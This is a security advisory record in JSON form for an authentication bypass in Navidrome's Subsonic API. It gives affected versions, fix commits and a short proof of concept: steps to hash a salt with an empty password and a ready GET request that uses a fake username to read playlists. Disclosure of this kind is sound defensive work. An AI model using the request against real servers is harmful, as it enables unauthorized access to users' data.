{"schema_version":"1.7.3","id":"GHSA-c3p4-vm8f-386p","published":"2025-02-25T17:49:07Z","modified":"2025-03-03T19:42:03.959698Z","aliases":["CVE-2025-27112","GO-2025-3484"],"summary":"Navidrome allows an authentication bypass in Subsonic API with non-existent username","details":"### Summary\n\nIn certain Subsonic API endpoints, authentication can be bypassed by using a non-existent username combined with an empty (salted) password hash. This allows read-only access to the server’s resources, though attempts at write operations fail with a “permission denied” error.\n\n### Details\n\nA flaw in the authentication check process allows an attacker to specify any arbitrary username that does not exist on the system, along with a salted hash of an empty password. Under these conditions, Navidrome treats the request as authenticated, granting access to various Subsonic endpoints without requiring valid credentials.\n\n### Proof of Concept (PoC)\n\n1. Generate a random salt:\n\n   ```javascript\n   // e.g., salt = \"x1vbudn1m6d\"\n   Math.random().toString(36).substring(2, 15)\n   ```\n\n2. Calculate the MD5 hash of an empty password plus the salt:\n\n   ```shell\n   # Using the example salt above\n   echo -n \"x1vbudn1m6d\" | md5sum\n   81f0c0fb5d202ab0d012e6eaeb722d79  -\n   ```\n\n3. Send a request specifying a fake user, with the hash and salt values:\n\n   ```\n   GET https://[host]/rest/getPlaylists?u=FakeUser&t=81f0c0fb5d202ab0d012e6eaeb722d79&s=x1vbudn1m6d&v=1.16.1&c=castafiore&f=json\n   ```\n\n### Impact\n\nAn attacker can use any non-existent username to bypass the authentication system and gain access to various read-only data in Navidrome, such as user playlists. However, any attempt to modify data fails due to insufficient permissions, limiting the impact to unauthorized viewing of information.","affected":[{"package":{"name":"github.com/navidrome/navidrome","ecosystem":"Go","purl":"pkg:golang/github.com/navidrome/navidrome"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.52.0"},{"fixed":"0.54.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-c3p4-vm8f-386p/GHSA-c3p4-vm8f-386p.json"}}],"references":[{"type":"WEB","url":"https://github.com/navidrome/navidrome/security/advisories/GHSA-c3p4-vm8f-386p"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27112"},{"type":"WEB","url":"https://github.com/navidrome/navidrome/commit/09ae41a2da66264c60ef307882362d2e2d8d8b89"},{"type":"WEB","url":"https://github.com/navidrome/navidrome/commit/287079a9e409fb6b9708ca384d7daa7b5185c1a0"},{"type":"PACKAGE","url":"https://github.com/navidrome/navidrome"}],"database_specific":{"cwe_ids":["CWE-287"],"github_reviewed":true,"github_reviewed_at":"2025-02-25T17:49:07Z","nvd_published_at":"2025-02-24T19:15:14Z","severity":"MODERATE"},"severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"}]}